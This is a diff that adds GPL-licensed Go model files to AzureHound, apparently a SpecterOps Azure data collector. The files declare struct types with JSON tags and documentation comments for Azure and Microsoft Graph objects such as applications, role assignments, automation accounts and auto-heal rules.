-0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type App struct { + azure.Application + TenantId string `json:"tenantId"` + TenantName string `json:"tenantName"` +} diff --git a/models/automation-account.go b/models/automation-account.go new file mode 100644 index 0000000..0e3bfea --- /dev/null +++ b/models/automation-account.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type AutomationAccount struct { + azure.AutomationAccount + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + ResourceGroupName string `json:"resourceGroupName"` + TenantId string `json:"tenantId"` +} diff --git a/models/azure-role-assignment.go b/models/azure-role-assignment.go new file mode 100644 index 0000000..e8ba1a2 --- /dev/null +++ b/models/azure-role-assignment.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type AzureRoleAssignment struct { + Assignee azure.RoleAssignment `json:"assignee"` + ObjectId string `json:"objectId"` + RoleDefinitionId string `json:"roleDefinitionId"` +} + +type AzureRoleAssignments struct { + RoleAssignments []AzureRoleAssignment `json:"assignees"` + ObjectId string `json:"objectId"` +} diff --git a/models/azure/access_policy_entry.go b/models/azure/access_policy_entry.go new file mode 100644 index 0000000..5477af0 --- /dev/null +++ b/models/azure/access_policy_entry.go @@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// An identity that have access to the key vault. All identities in the array must use the same tenant ID as the key +// vault's tenant ID. +type AccessPolicyEntry struct { + // Application ID of the client making request on behalf of a principal + ApplicationId string `json:"applicationId,omitempty"` + + // The object ID of a user, service principal or security group in the Azure Active Directory tenant for the vault. + // The object ID must be unique for the list of access policies. + ObjectId string `json:"objectId,omitempty"` + + // Permissions the identity has for keys, secrets and certificates. + Permissions KeyVaultPermissions `json:"permissions,omitempty"` + + // The Azure Active Directory tenant ID that should be used for authenticating requests to the key vault. + TenantId string `json:"tenantId,omitempty"` +} diff --git a/models/azure/addin.go b/models/azure/addin.go new file mode 100644 index 0000000..84faafb --- /dev/null +++ b/models/azure/addin.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/gofrs/uuid" + +// Defines custom behavior that a consuming service can use to call an app in specific contexts.For example, applications +// that can render file streams may configure addIns for its "FileHandler" functionality. This will let services like +// Microsoft 365 call the application in the context of a document the user is working on. +type AddIn struct { + Id uuid.UUID `json:"id,omitempty"` + Properties []KeyValue `json:"properties,omitempty"` + Type string `json:"type,omitempty"` +} diff --git a/models/azure/additional_capabilities.go b/models/azure/additional_capabilities.go new file mode 100644 index 0000000..e91dabe --- /dev/null +++ b/models/azure/additional_capabilities.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Enables or disables a capability on the virtual machine or virtual machine scale set. +type AdditionalCapabilities struct { + // The flag that enables or disables hibernation capability on the VM. + HibernationEnabled bool `json:"hibernationEnabled,omitempty"` + + // The flag that enables or disables a capability to have one or more managed data disks with UltraSSD_LRS storage + // account type on the VM or VMSS. Managed disks with storage account type UltraSSD_LRS can be added to a virtual + // machine or virtual machine scale set only if this property is enabled. + UltraSSDEnabled bool `json:"ultraSSDEnabled,omitempty"` +} diff --git a/models/azure/additional_unattend_content.go b/models/azure/additional_unattend_content.go new file mode 100644 index 0000000..7545bea --- /dev/null +++ b/models/azure/additional_unattend_content.go @@ -0,0 +1,36 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies additional XML formatted information that can be included in the Unattend.xml file, which is used by +// Windows Setup. Contents are defined by setting name, component name, and the pass in which the content is applied. +type AdditionalUnattendContent struct { + // The component name. Currently, the only allowable value is Microsoft-Windows-Shell-Setup. + ComponentName string `json:"componentName,omitempty"` + + // Specifies the XML formatted content that is added to the unattend.xml file for the specified path and component. + // The XML must be less than 4KB and must include the root element for the setting or feature that is being inserted. + Content string `json:"content,omitempty"` + + // The pass name. Currently, the only allowable value is OobeSystem. + PassName string `json:"passName,omitempty"` + + // Specifies the name of the setting to which the content applies. + // Possible values are: FirstLogonCommands and AutoLogon. + SettingName string `json:"settingName,omitempty"` +} diff --git a/models/azure/alt_security_id.go b/models/azure/alt_security_id.go new file mode 100644 index 0000000..1134353 --- /dev/null +++ b/models/azure/alt_security_id.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// For internal use only. This complex type will be deprecated in the future. +type AlternativeSecurityId struct { + Type int32 `json:"type,omitempty"` + IdentityProvider string `json:"identity_provider,omitempty"` + + // Base64Url encoded. + Key string `json:"key,omitempty"` +} diff --git a/models/azure/api_application.go b/models/azure/api_application.go new file mode 100644 index 0000000..d282da4 --- /dev/null +++ b/models/azure/api_application.go @@ -0,0 +1,59 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/gofrs/uuid" + +// Specifies settings for an application that implements a web API. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/apiapplication?view=graph-rest-1.0 +type ApiApplication struct { + // When true, allows an application to use claims mapping without specifying a custom signing key. + AcceptMappedClaims bool `json:"acceptMappedClaims,omitempty"` + + // Used for bundling consent if you have a solution that contains two parts: a client app and a custom web API app. + // If you set the appID of the client app to this value, the user only consents once to the client app. Azure AD + // knows that consenting to the client means implicitly consenting to the web API and automatically provisions + // service principals for both APIs at the same time. Both the client and the web API app must be registered in the + // same tenant. + KnownClientApplications []uuid.UUID `json:"knownClientApplications,omitempty"` + + // The definition of the delegated permissions exposed by the web API represented by this application registration. + // These delegated permissions may be requested by a client application, and may be granted by users or + // administrators during consent. Delegated permissions are sometimes referred to as OAuth 2.0 scopes. + OAuth2PermissionScopes []PermissionScope `json:"oauth2PermissionScopes,omitempty"` + + // Lists the client applications that are pre-authorized with the specified delegated permissions to access this + // application's APIs. Users are not required to consent to any pre-authorized application (for the permissions + // specified). However, any additional permissions not listed in preAuthorizedApplications (requested through + // incremental consent for example) will require user consent. + PreAuthorizedApplications []PreAuthorizedApplication `json:"preAuthorizedApplications,omitempty"` + + // Specifies the access token version expected by this resource. + // This changes the version and format of the JWT produced independent of the endpoint or client used to request the + // access token. + // + // The endpoint used, v1.0 or v2.0, is chosen by the client and only impacts the version of id_tokens. Resources + // need to explicitly configure requestedAccessTokenVersion to indicate the supported access token format. + // + // Possible values for requestedAccessTokenVersion are 1, 2, or null. If the value is null, this defaults to 1, + // which corresponds to the v1.0 endpoint. + // + // If signInAudience on the application is configured as AzureADandPersonalMicrosoftAccount, the value for this + //property must be 2 + RequestedAccessTokenVersion int32 `json:"requestedAccessTokenVersion,omitempty"` +} diff --git a/models/azure/app_profile.go b/models/azure/app_profile.go new file mode 100644 index 0000000..874235f --- /dev/null +++ b/models/azure/app_profile.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Contains the list of gallery applications that should be made available to the VM/VMSS. +type ApplicationProfile struct { + // Specifies the gallery applications that should be made available to the VM/VMSS + GalleryApplications []VMGalleryApplication `json:"galleryApplications,omitempty"` +} diff --git a/models/azure/app_role.go b/models/azure/app_role.go new file mode 100644 index 0000000..fd82fe6 --- /dev/null +++ b/models/azure/app_role.go @@ -0,0 +1,41 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/gofrs/uuid" + +// Represents an application role that can be requested by (and granted to) a client application, or that can be used to +// assign an application to users or groups in a specified role. +// +// To add, update, or remove app roles for an application, update the application for the app or service. App roles on +// the application entity will be available in all tenants where the application is used. To define app roles that are +// only applicable in your tenant (for example, app roles representing custom roles in your instance of a multi-tenant +// application), you can also update the service principal for the app, to add or update app roles to the appRoles +// collection. +// +// With appRoleAssignments, app roles can be assigned to users, groups, or other applications' service principals. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/approle?view=graph-rest-1.0 +type AppRole struct { + AllowedMemberTypes []string `json:"allowedMemberTypes,omitempty"` + Description string `json:"description,omitempty"` + DisplayName string `json:"displayName,omitempty"` + Id uuid.UUID `json:"id,omitempty"` + IsEnabled bool `json:"isEnabled,omitempty"` + Origin string `json:"origin,omitempty"` + Value string `json:"value,omitempty"` +} diff --git a/models/azure/app_role_assignment.go b/models/azure/app_role_assignment.go new file mode 100644 index 0000000..708a4d8 --- /dev/null +++ b/models/azure/app_role_assignment.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/gofrs/uuid" + +// Represents an application role that can be requested by (and granted to) a client application, or that can be used to +// assign an application to users or groups in a specified role. +// +// An app role assignment is a relationship between the assigned principal (a user, a group, or a service principal), +// a resource application (the app's service principal) and an app role defined on the resource application. +// +// With appRoleAssignments, app roles can be assigned to users, groups, or other applications' service principals. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/approleassignment?view=graph-rest-1.0 +type AppRoleAssignment struct { + AppRoleId uuid.UUID `json:"appRoleId,omitempty"` + CreatedDateTime string `json:"createdDateTime,omitempty"` + Id string `json:"id,omitempty"` + PrincipalDisplayName string `json:"principalDisplayName,omitempty"` + PrincipalId uuid.UUID `json:"principalId,omitempty"` + PrincipalType string `json:"principalType,omitempty"` + ResourceDisplayName string `json:"resourceDisplayName,omitempty"` + ResourceId string `json:"resourceId,omitempty"` +} diff --git a/models/azure/app_scope.go b/models/azure/app_scope.go new file mode 100644 index 0000000..ff2da07 --- /dev/null +++ b/models/azure/app_scope.go @@ -0,0 +1,41 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The scope of a role assignment determines the set of resources for which the principal has been granted access. +// An app scope is a scope defined and understood by a specific application, unlike directory scopes which are shared +// scopes stored in the directory and understood by multiple applications. +// +// This may be in both the following principal and scope scenarios: +// +// A single principal and a single scope +// Multiple principals and multiple scopes. +type AppScope struct { + Entity + + // Provides the display name of the app-specific resource represented by the app scope. + // Provided for display purposes since appScopeId is often an immutable, non-human-readable id. + // Read-only. + DisplayName string `json:"display_name,omitempty"` + + // Describes the type of app-specific resource represented by the app scope. + // Provided for display purposes, so a user interface can convey to the user the kind of app specific resource + // represented by the app scope. + // Read-only. + Type string `json:"type,omitempty"` +} diff --git a/models/azure/application.go b/models/azure/application.go new file mode 100644 index 0000000..a44a103 --- /dev/null +++ b/models/azure/application.go @@ -0,0 +1,171 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents an application. Any application that outsources authentication to Azure Active Directory (Azure AD) must +// be registered in a directory. Application registration involves telling Azure AD about your application, including +// the URL where it's located, the URL to send replies after authentication, the URI to identify your application, and +// more. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/application?view=graph-rest-1.0 +type Application struct { + DirectoryObject + + // Defines custom behavior that a consuming service can use to call an app in specific contexts. + // For example, applications that can render file streams may set the addIns property for its "FileHandler" + // functionality. This will let services like Office 365 call the application in the context of a document the user + // is working on. + AddIns []AddIn `json:"addIns,omitempty"` + + // Specifies settings for an application that implements a web API. + Api ApiApplication `json:"api,omitempty"` + + // The unique identifier for the application that is assigned to an application by Azure AD. Not nullable. Read-only. + AppId string `json:"appId,omitempty"` + + // Unique identifier of the applicationTemplate. + ApplicationTemplateId string `json:"applicationTemplateId,omitempty"` + + // The collection of roles assigned to the application. + // With app role assignments, these roles can be assigned to users, groups, or service principals associated with + // other applications. Not nullable. + AppRoles []AppRole `json:"appRoles,omitempty"` + + // The date and time the application was registered. + // The DateTimeOffset type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Read-only. + // + // Supports $filter (eq, ne, NOT, ge, le, in) and $orderBy. + CreatedDateTime string `json:"createdDateTime,omitempty"` + + // The date and time the application was deleted. The DateTimeOffset type represents date and time information using + // ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Read-only. + DeletedDateTime string `json:"deletedDateTime,omitempty"` + + // An optional description of the application. + // Supports $filter (eq, ne, NOT, ge, le, startsWith) and $search. + Description string `json:"description,omitempty"` + + // Specifies whether Microsoft has disabled the registered application. + // Possible values are: null (default value), NotDisabled, and DisabledDueToViolationOfServicesAgreement + // (reasons may include suspicious, abusive, or malicious activity, or a violation of the Microsoft Services + // Agreement). + DisabledByMicrosoftStatus string `json:"disabledByMicrosoftStatus,omitempty"` + + // The display name for the application. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith), $search, and $orderBy. + DisplayName string `json:"displayName,omitempty"` + + // Configures the groups claim issued in a user or OAuth 2.0 access token that the application expects. + // To set this attribute, use one of the following valid string values: + // - None + // - SecurityGroup (for security groups and Azure AD roles) + // - All (this gets all of the security groups, distribution groups, and Azure AD directory roles that the signed-in user is a member of) + GroupMembershipClaims string `json:"groupMembershipClaims,omitempty"` + + // The URIs that identify the application within its Azure AD tenant, or within a verified custom domain if the + // application is multi-tenant. For more information see Application Objects and Service Principal Objects. + // The any operator is required for filter expressions on multi-valued properties. + // Not nullable. + // Supports $filter (eq, ne, ge, le, startsWith). + IdentifierUris []string `json:"identifierUris,omitempty"` + + // Basic profile information of the application such as app's marketing, support, terms of service and privacy + // statement URLs. The terms of service and privacy statement are surfaced to users through the user consent + // experience. For more info, see How to: Add Terms of service and privacy statement for registered Azure AD apps. + // Supports $filter (eq, ne, NOT, ge, le). + Info InformationalUrl `json:"info,omitempty"` + + // Specifies whether this application supports device authentication without a user. + // The default is false. + IsDeviceOnlyAuthSupported bool `json:"isDeviceOnlyAuthSupported,omitempty"` + + // Specifies the fallback application type as public client, such as an installed application running on a mobile + // device. + // The default value is false which means the fallback application type is confidential client such as a web app. + // There are certain scenarios where Azure AD cannot determine the client application type. For example, the ROPC + // flow where it is configured without specifying a redirect URI. In those cases Azure AD interprets the application + // type based on the value of this property. + IsFallbackPublicClient bool `json:"isFallbackPublicClient,omitempty"` + + // The collection of key credentials associated with the application. + // Not nullable. + // Supports $filter (eq, NOT, ge, le). + KeyCredentials []KeyCredential `json:"keyCredentials,omitempty"` + + // The main logo for the application. Not nullable. + // Base64Url encoded. + Logo string `json:"logo,omitempty"` + + // Notes relevant for the management of the application. + Notes string `json:"notes,omitempty"` + + // Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. + // The default is false, which specifies that only GET requests are allowed. + OAuth2RequiredPostResponse bool `json:"oauth2RequiredPostResponse,omitempty"` + + // Application developers can configure optional claims in their Azure AD applications to specify the claims that + // are sent to their application by the Microsoft security token service. + // For more information, see How to: Provide optional claims to your app. + OptionalClaims OptionalClaims `json:"optionalClaims,omitempty"` + + // Specifies parental control settings for an application. + ParentalControlSettings ParentalControlSettings `json:"parentalControlSettings,omitempty"` + + // The collection of password credentials associated with the application. Not nullable. + PasswordCredentials []PasswordCredential `json:"passwordCredentials,omitempty"` + + // Specifies settings for installed clients such as desktop or mobile devices. + PublicClient PublicClientApplication `json:"publicClient,omitempty"` + + // The verified publisher domain for the application. Read-only. + // For more information, see How to: Configure an application's publisher domain. + // Supports $filter (eq, ne, ge, le, startsWith). + PublisherDomain string `json:"publisherDomain,omitempty"` + + // Specifies the resources that the application needs to access. + // This property also specifies the set of delegated permissions and application roles that it needs for each of + // those resources. This configuration of access to the required resources drives the consent experience. No more + // than 50 resource services (APIs) can be configured. Beginning mid-October 2021, the total number of required + // permissions must not exceed 400. Not nullable. + RequiredResourceAccess []RequiredResourceAccess `json:"requiredResourceAccess,omitempty"` + + // Specifies the Microsoft accounts that are supported for the current application. + // The possible values are: AzureADMyOrg, AzureADMultipleOrgs, AzureADandPersonalMicrosoftAccount (default), and + // PersonalMicrosoftAccount. See more in the table below. + SignInAudience string `json:"signInAudience,omitempty"` + + // Specifies settings for a single-page application, including sign out URLs and redirect URIs for authorization + // codes and access tokens. + SPA SPAApplication `json:"spa,omitempty"` + + // Custom strings that can be used to categorize and identify the application. Not nullable. + Tags []string `json:"tags,omitempty"` + + // Specifies the keyId of a public key from the keyCredentials collection. + // When configured, Azure AD encrypts all the tokens it emits by using the key this property points to. The + // application code that receives the encrypted token must use the matching private key to decrypt the token before + // it can be used for the signed-in user. + TokenEncryptionKeyId string `json:"tokenEncryptionKeyId,omitempty"` + + // Specifies the verified publisher of the application. + VerifiedPublisher VerifiedPublisher `json:"verifiedPublisher,omitempty"` + + // Specifies settings for a web application. + Web WebApplication `json:"web,omitempty"` +} diff --git a/models/azure/assigned_label.go b/models/azure/assigned_label.go new file mode 100644 index 0000000..c5e2f84 --- /dev/null +++ b/models/azure/assigned_label.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents a sensitivity label assigned to a Microsoft 365 group. Sensitivity labels allow administrators to enforce +// specific group settings on a group by assigning a classification to the group (such as Confidential, Highly Confidential +// or General). Sensitivity labels are published by administrators in Microsoft 365 Security & Compliance Center as part +// of Microsoft Information Protection capabilities. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/assignedlabel?view=graph-rest-1.0 +type AssignedLabel struct { + // The unique identifier of the label. + LabelId string `json:"labelId,omitempty"` + + // The display name of the label. Read-only. + DisplayName string `json:"displayName,omitempty"` +} diff --git a/models/azure/assigned_license.go b/models/azure/assigned_license.go new file mode 100644 index 0000000..71cd310 --- /dev/null +++ b/models/azure/assigned_license.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/gofrs/uuid" + +// Represents a license assigned to a user. +type AssignedLicense struct { + // A collection of the unique identifiers for plans that have been disabled. + DisabledPlans []uuid.UUID `json:"disabledPlans,omitempty"` + + // The unique identifier for the SKU. + SkuId uuid.UUID `json:"skuId,omitempty"` +} diff --git a/models/azure/assigned_plan.go b/models/azure/assigned_plan.go new file mode 100644 index 0000000..fa5809f --- /dev/null +++ b/models/azure/assigned_plan.go @@ -0,0 +1,38 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/gofrs/uuid" +) + +// Represents a plan assigned to user and organization entities. +type AssignedPlan struct { + // The date and time at which the plan was assigned using ISO 8601 format. + AssignedDateTime string `json:"assignedDateTime,omitempty"` + + // Condition of the capability assignment. + CapabilityStatus enums.CapabiltyStatus `json:"capabilityStatus,omitempty"` + + // The name of the service. + Service string `json:"service,omitempty"` + + // A GUID that identifies the service plan. + ServicePlanId uuid.UUID `json:"servicePlanId,omitempty"` +} diff --git a/models/azure/auto_heal_rules.go b/models/azure/auto_heal_rules.go new file mode 100644 index 0000000..8c181a2 --- /dev/null +++ b/models/azure/auto_heal_rules.go @@ -0,0 +1,75 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +type AutoHealRules struct { + Actions AutoHealActions `json:"actions,omitempty"` + Triggers AutoHealTriggers `json:"triggers,omitempty"` +} + +type AutoHealActions struct { + ActionType enums.AutoHealActionType `json:"actionType,omitempty"` + CustomAction AutoHealCustomAction `json:"customAction,omitempty"` + MinProcessExecutionTime string `json:"minProcessExecutionTime,omitempty"` +} + +type AutoHealCustomAction struct { + Exe string `json:"exe,omitempty"` + Parameters string `json:"parameters,omitempty"` +} + +type AutoHealTriggers struct { + PrivateBytesInKB int `json:"privateBytesInKB,omitempty"` + Requests RequestsBasedTrigger `json:"requests,omitempty"` + SlowRequests SlowRequestsBasedTrigger `json:"slowRequests,omitempty"` + SlowRequestsWithPath []SlowRequestsBasedTrigger `json:"slowRequestsWithPath,omitempty"` + StatusCodes []StatusCodesBasedTrigger `json:"statusCodes,omitempty"` + StatusCodesRange []StatusCodesRangeBasedTrigger `json:"statusCodesRange,omitempty"` +} + +type RequestsBasedTrigger struct { + Count int `json:"count,omitempty"` + TimeInterval string `json:"timeinterval,omitempty"` +} + +type SlowRequestsBasedTrigger struct { + Count int `json:"count,omitempty"` + Path string `json:"path,omitempty"` + TimeInterval string `json:"timeInterval,omitempty"` + TimeTaken string `json:"timeTaken,omitempty"` +} + +type StatusCodesBasedTrigger struct { + Count int `json:"count,omitempty"` + Path string `json:"path,omitempty"` + Status int `json:"status,omitempty"` + SubStatus int `json:"subStatus,omitempty"` + TimeInterval string `json:"timeInterval,omitempty"` + Win32Status int `json:"win32Status,omitempty"` +} + +type StatusCodesRangeBasedTrigger struct { + Count int `json:"count,omitempty"` + Path string `json:"path,omitempty"` + StatusCodes string `json:"statusCodes,omitempty"` + TimeInterval string `json:"timeInterval,omitempty"` +} diff --git a/models/azure/automatic_replies_setting.go b/models/azure/automatic_replies_setting.go new file mode 100644 index 0000000..f500ce6 --- /dev/null +++ b/models/azure/automatic_replies_setting.go @@ -0,0 +1,45 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Configuration settings to automatically notify the sender of an incoming email with a message from the signed-in +// user. +type AutomaticRepliesSetting struct { + // The set of audience external to the signed-in user's organization who will receive the {@link + // ExternalReplyMessage}. + ExternalAudience 